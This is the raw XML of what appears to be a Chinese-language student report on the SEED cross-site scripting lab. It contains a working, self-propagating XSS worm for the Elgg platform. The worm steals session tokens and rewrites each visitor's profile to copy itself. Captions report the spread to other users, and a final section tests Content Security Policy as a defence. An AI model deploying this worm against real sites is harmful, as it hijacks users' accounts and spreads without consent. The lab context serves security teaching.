    </w:p>
    <w:p w14:paraId="34AF3AEB" w14:textId="77777777" w:rsidR="00455DEE" w:rsidRDefault="00455DEE" w:rsidP="00455DEE">
      <w:r>
        <w:t xml:space="preserve">var headerTag = "&lt;script id=\"worm\" type=\"text/javascript\"&gt;"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41740FCE" w14:textId="77777777" w:rsidR="00455DEE" w:rsidRDefault="00455DEE" w:rsidP="00455DEE">
      <w:r>
        <w:t xml:space="preserve">var jsCode = document.getElementById("worm").innerHTML; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8F21C9" w14:textId="77777777" w:rsidR="00455DEE" w:rsidRDefault="00455DEE" w:rsidP="00455DEE">
      <w:r>
        <w:t xml:space="preserve">var tailTag = "&lt;/" + "script&gt;"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0FEE97" w14:textId="77777777" w:rsidR="00455DEE" w:rsidRDefault="00455DEE" w:rsidP="00455DEE">
      <w:r>
        <w:t xml:space="preserve">var wormCode = encodeURIComponent(headerTag + jsCode + tailTag); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1040F724" w14:textId="77777777" w:rsidR="00455DEE" w:rsidRDefault="00455DEE" w:rsidP="00455DEE">
      <w:r>
        <w:t>var userName="&amp;name="+elgg.session.user.name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2755E337" w14:textId="77777777" w:rsidR="00455DEE" w:rsidRDefault="00455DEE" w:rsidP="00455DEE">
      <w:r>
        <w:t>var guid="&amp;guid="+elgg.session.user.guid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FA853B" w14:textId="77777777" w:rsidR="00455DEE" w:rsidRDefault="00455DEE" w:rsidP="00455DEE">
      <w:r>
        <w:t>var ts="&amp;__elgg_ts="+elgg.security.token.__elgg_ts;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D5F084" w14:textId="77777777" w:rsidR="00455DEE" w:rsidRDefault="00455DEE" w:rsidP="00455DEE">
      <w:r>
        <w:t>var token="&amp;__elgg_token="+elgg.security.token.__elgg_token;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F78C7C0" w14:textId="77777777" w:rsidR="00455DEE" w:rsidRDefault="00455DEE" w:rsidP="00455DEE">
      <w:r>
        <w:t xml:space="preserve">var content=token+ts+"name="+userName+"&amp;description="+wormCode+"&amp;accesslevel[description]=2&amp;briefdescription=Samy is my hero&amp;accesslevel[briefdescription]=2&amp;location=&amp;accesslevel[location]=2&amp;interests=&amp;accesslevel[interests]=2&amp;skills=&amp;accesslevel[skills]=2&amp;contactemail=&amp;accesslevel[contactemail]=2&amp;phone=&amp;accesslevel[phone]=2&amp;mobile=&amp;accesslevel[mobile]=2&amp;website=&amp;accesslevel[website]=2&amp;twitter=&amp;accesslevel[twitter]=2"+guid; ; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3793FBC0" w14:textId="77777777" w:rsidR="00455DEE" w:rsidRDefault="00455DEE" w:rsidP="00455DEE">
      <w:r>
        <w:t xml:space="preserve">var samyGuid=59; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432DB6E9" w14:textId="77777777" w:rsidR="00455DEE" w:rsidRDefault="00455DEE" w:rsidP="00455DEE">
      <w:r>
        <w:t xml:space="preserve">var sendurl="http://www.seed-server.com/action/profile/edit"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCEF165" w14:textId="77777777" w:rsidR="00455DEE" w:rsidRDefault="00455DEE" w:rsidP="00455DEE">
      <w:r>
        <w:t xml:space="preserve">if(elgg.session.user.guid!=samyGuid) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0F86FB" w14:textId="77777777" w:rsidR="00455DEE" w:rsidRDefault="00455DEE" w:rsidP="00455DEE">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BA3C7A" w14:textId="77777777" w:rsidR="00455DEE" w:rsidRDefault="00455DEE" w:rsidP="00455DEE">
      <w:r>
        <w:t>var Ajax=null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAEE05E" w14:textId="77777777" w:rsidR="00455DEE" w:rsidRDefault="00455DEE" w:rsidP="00455DEE">
      <w:r>
        <w:t>Ajax=new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E2845E" w14:textId="77777777" w:rsidR="00455DEE" w:rsidRDefault="00455DEE" w:rsidP="00455DEE">
      <w:r>
        <w:t>Ajax.open("POST", sendurl, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFCB456" w14:textId="77777777" w:rsidR="00455DEE" w:rsidRDefault="00455DEE" w:rsidP="00455DEE">
      <w:r>
        <w:t>Ajax.setRequestHeader("Content-Type",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529F04D5" w14:textId="77777777" w:rsidR="00455DEE" w:rsidRDefault="00455DEE" w:rsidP="00455DEE">
      <w:r>
        <w:t>"application/x-www-form-urlencoded");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3989450F" w14:textId="77777777" w:rsidR="00455DEE" w:rsidRDefault="00455DEE" w:rsidP="00455DEE">
      <w:r>
        <w:t>Ajax.send(content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622B1695" w14:textId="77777777" w:rsidR="00455DEE" w:rsidRDefault="00455DEE" w:rsidP="00455DEE">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0E2C92" w14:textId="77777777" w:rsidR="00455DEE" w:rsidRDefault="00455DEE" w:rsidP="00455DEE">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708D8332" w14:textId="29430F09" w:rsidR="00455DEE" w:rsidRDefault="00455DEE" w:rsidP="00455DEE">
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA49A6C" w14:textId="77777777" w:rsidR="002409E8" w:rsidRDefault="002409E8" w:rsidP="00455DEE"/>
    <w:p w14:paraId="775FE252" w14:textId="680BD6F9" w:rsidR="002409E8" w:rsidRDefault="002409E8" w:rsidP="00455DEE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002409E8">
        <w:t>Alice 访问 Samy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A64D33E" w14:textId="6DBD7A83" w:rsidR="00455DEE" w:rsidRDefault="00455DEE">
      <w:r w:rsidRPr="00455DEE">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="150CC828" wp14:editId="26675F07">
            <wp:extent cx="4686706" cy="598221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F1FF" w14:textId="55EF9BB0" w:rsidR="002409E8" w:rsidRDefault="002409E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002409E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r w:rsidRPr="002409E8">
        <w:t xml:space="preserve"> Alice 的信息，其已经复制了 Samy 的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5859691E" w14:textId="60A3B230" w:rsidR="00455DEE" w:rsidRDefault="00455DEE">
      <w:r w:rsidRPr="00455DEE">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="778E043D" wp14:editId="125D3581">
            <wp:extent cx="5274310" cy="3148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F613" w14:textId="7C8C444E" w:rsidR="002409E8" w:rsidRDefault="002409E8" w:rsidP="002409E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002409E8">
        <w:t>Boby 访问 Alice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="002409E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r w:rsidRPr="002409E8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>boby</w:t>
      </w:r>
      <w:r w:rsidRPr="002409E8">
        <w:t>的信息，其已经复制了 Samy 的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F7C0BF" w14:textId="0470EF2D" w:rsidR="002409E8" w:rsidRDefault="002409E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E7B71EB" w14:textId="5B6335ED" w:rsidR="00455DEE" w:rsidRDefault="00455DEE">
      <w:r w:rsidRPr="00455DEE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="070D3531" wp14:editId="3459F6AA">
            <wp:extent cx="5274310" cy="3924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9C2B" w14:textId="0B7CCAEC" w:rsidR="002409E8" w:rsidRDefault="002409E8">
      <w:r w:rsidRPr="002409E8">
        <w:t>TASK 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D817A67" w14:textId="11658FB7" w:rsidR="002409E8" w:rsidRDefault="002409E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002409E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidRPr="002409E8">
        <w:t xml:space="preserve"> CSP config 文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B814E48" w14:textId="46BC010F" w:rsidR="00990AE7" w:rsidRDefault="00990AE7">
      <w:r w:rsidRPr="00990AE7">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="502EE5BA" wp14:editId="3CF764BE">
            <wp:extent cx="5274310" cy="5459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7BC2" w14:textId="48688445" w:rsidR="002409E8" w:rsidRDefault="002409E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002409E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372F8355" w14:textId="5B8997AE" w:rsidR="00990AE7" w:rsidRDefault="00990AE7">
      <w:r w:rsidRPr="00990AE7">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20670BF4" wp14:editId="011346A3">
            <wp:extent cx="5274310" cy="3341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DE74" w14:textId="0F2EAA7E" w:rsidR="00990AE7" w:rsidRDefault="00990AE7">
      <w:r w:rsidRPr="00990AE7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19D5C4DA" wp14:editId="38EDA062">
            <wp:extent cx="4846740" cy="300254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3EA" w14:textId="0FBB16E7" w:rsidR="00990AE7" w:rsidRDefault="00990AE7">
      <w:r w:rsidRPr="00990AE7">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D9CD262" wp14:editId="243FA968">
            <wp:extent cx="3856054" cy="304064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5B78" w14:textId="77777777" w:rsidR="002409E8" w:rsidRDefault="002409E8" w:rsidP="002409E8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上述三个对比实验得出结论：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7DE303" w14:textId="7115C1E4" w:rsidR="002409E8" w:rsidRDefault="002409E8" w:rsidP="002409E8">
      <w:r>
        <w:t>1、a 网站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">启用 CSP 防御，所有 javascript 执行成功。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517AAA74" w14:textId="77777777" w:rsidR="002409E8" w:rsidRDefault="002409E8" w:rsidP="002409E8">
      <w:r>
        <w:t xml:space="preserve">2、b 网站通过 Apache 方式设置 CSP 防御，只有受信的 4、6 两个源执行成功。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E9FF1A" w14:textId="77777777" w:rsidR="002409E8" w:rsidRDefault="002409E8" w:rsidP="002409E8">
      <w:r>
        <w:t xml:space="preserve">3、c 网站通过 php 方式设置 CSP 防御，只有受信的 1、4、6 三个源执行成功。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1855F9" w14:textId="2E308C5D" w:rsidR="002409E8" w:rsidRDefault="002409E8" w:rsidP="002409E8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击按钮后</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a 网站执行成功，b、c 网站均不执行按钮操作，故 CSP 防御有效。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176A6008" w14:textId="72F5C371" w:rsidR="002409E8" w:rsidRDefault="002409E8" w:rsidP="002409E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即 若要</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">使相关源的 JavaScript 执行成功，只需要在 CSP 的设置中将其源设置为可信源 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002409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80C08" w14:textId="77777777" w:rsidR="002B39D9" w:rsidRDefault="002B39D9" w:rsidP="004A4D43">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="52890D8C" w14:textId="77777777" w:rsidR="002B39D9" w:rsidRDefault="002B39D9" w:rsidP="004A4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506D9" w14:textId="77777777" w:rsidR="002B39D9" w:rsidRDefault="002B39D9" w:rsidP="004A4D43">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1CD2CE9A" w14:textId="77777777" w:rsidR="002B39D9" w:rsidRDefault="002B39D9" w:rsidP="004A4D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45A"/>
    <w:rsid w:val="0005430D"/>
    <w:rsid w:val="002409E8"/>
    <w:rsid w:val="002B39D9"/>
    <w:rsid w:val="003C44FD"/>
    <w:rsid w:val="00455DEE"/>
    <w:rsid w:val="004A4D43"/>
    <w:rsid w:val="004C1072"/>
    <w:rsid w:val="005517D3"/>
    <w:rsid w:val="00656714"/>
    <w:rsid w:val="0070345A"/>
    <w:rsid w:val="00943AB5"/>
    <w:rsid w:val="00990AE7"/>
    <w:rsid w:val="00B44701"/>
    <w:rsid w:val="00C93EF4"/>
    <w:rsid w:val="00DA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1E88F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A8C98D96-5E7A-4F29-BC16-CC9050CF2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4D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4D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4D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4D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525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昂</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>高 昂</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-26T14:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-29T13:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>